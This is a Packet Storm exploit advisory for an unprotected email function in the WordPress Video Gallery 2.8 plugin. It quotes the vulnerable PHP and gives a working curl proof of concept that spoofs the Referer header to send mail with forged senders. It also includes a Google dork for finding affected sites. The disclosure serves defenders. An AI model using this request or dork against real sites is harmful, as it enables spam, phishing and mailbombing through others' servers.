Exploit the possiblities

WordPress Video Gallery 2.8 Unprotected Mail Page

WordPress Video Gallery 2.8 Unprotected Mail Page
Posted May 22, 2015
Authored by Claudio Viviani

WordPress Video Gallery plugin version 2.8 fails to protect email functionality allowing it to be leveraged for spam.

tags | exploit
MD5 | 277642e645191461c5d88c0fc4c98316

WordPress Video Gallery 2.8 Unprotected Mail Page

Change Mirror Download
######################

# Exploit Title : Wordpress Video Gallery 2.8 Unprotected Mail Page

# Exploit Author : Claudio Viviani

# Website Author: http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)

# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery

# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip

# Dork Google: index of "contus-video-gallery"


# Date : 2015-04-05

# Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox

######################

# Description

Wordpress Video Gallery 2.8 suffers from Unprotected Mail Page.

This vulnerability is exploitable to dos, phishing, mailbombing, spam...

The "email" ajax action is callable from any guest visitor (/contus-video-gallery/hdflvvideoshare.php)

/**
* Email function
*/
add_action( 'wp_ajax_email', 'email_function' );
add_action( 'wp_ajax_nopriv_email', 'email_function' );

function email_function() {
require_once( dirname( __FILE__ ) . '/email.php' );
die();
}

Any user can send email from /contus-video-gallery/email.php to any recipients.

The variables used to send emails are:

$to = filter_input( INPUT_POST, 'to', FILTER_VALIDATE_EMAIL );
$from = filter_input( INPUT_POST, 'from', FILTER_VALIDATE_EMAIL );
$url = filter_input( INPUT_POST, 'url', FILTER_VALIDATE_URL );
$subject = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
$message_content = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
$title = filter_input( INPUT_POST, 'title', FILTER_SANITIZE_STRING );
$referrer = parse_url( $_SERVER['HTTP_REFERER'] );
$referrer_host = $referrer['scheme'] . '://' . $referrer['host'];
$pageURL = 'http';

It assumes that if the provided “Referrer” field fits the website’s URL, then it’s okay to send this email:

if ( $referrer_host === $pageURL ) {
$headers = "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
$headers .= "From: " . "<" . $from . ">\r\n";
$headers .= "Reply-To: " . $from . "\r\n";
$headers .= "Return-path: " . $from;
$username = explode('@' , $from );
$username = ucfirst($username['0']);
$subject = $username . ' has shared a video with you.';
$emailtemplate_path = plugin_dir_url( __FILE__ ).'front/emailtemplate/Emailtemplate.html';
$message = file_get_contents( $emailtemplate_path);
$message = str_replace( '{subject}', $subject, $message );
$message = str_replace( '{message}', $message_content, $message);
$message = str_replace( '{videourl}',$url,$message );
$message = str_replace('{username}',$username ,$message );
if ( @mail( $to, $title, $message, $headers ) ) {
echo 'success=sent';
} else {
echo 'success=error';
}
} else {
echo 'success=error';
}

The “Referer” field can easily be modified by the attacker!

######################

# PoC

curl -X POST -d "from=attacker@attacker.com&to=victim@victim.com&Note=BodyMessage&title=Subject&url=http://www.homelab.it" \
-e http://127.0.0.1 http://127.0.0.1/wp-admin/admin-ajax.php?action=email

cUrl switch "-e" spoof referer address

# Http Response

success=sent

# Poc Video

http://youtu.be/qgOGPm1-tNc


#######################

Discovered By : Claudio Viviani
http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Archive Exploit)
http://ffhd.homelab.it (Free Fuzzy Hashes Database)

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

February 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    15 Files
  • 2
    Feb 2nd
    15 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    13 Files
  • 5
    Feb 5th
    16 Files
  • 6
    Feb 6th
    15 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    15 Files
  • 9
    Feb 9th
    18 Files
  • 10
    Feb 10th
    8 Files
  • 11
    Feb 11th
    8 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    15 Files
  • 14
    Feb 14th
    15 Files
  • 15
    Feb 15th
    17 Files
  • 16
    Feb 16th
    18 Files
  • 17
    Feb 17th
    37 Files
  • 18
    Feb 18th
    2 Files
  • 19
    Feb 19th
    16 Files
  • 20
    Feb 20th
    11 Files
  • 21
    Feb 21st
    3 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close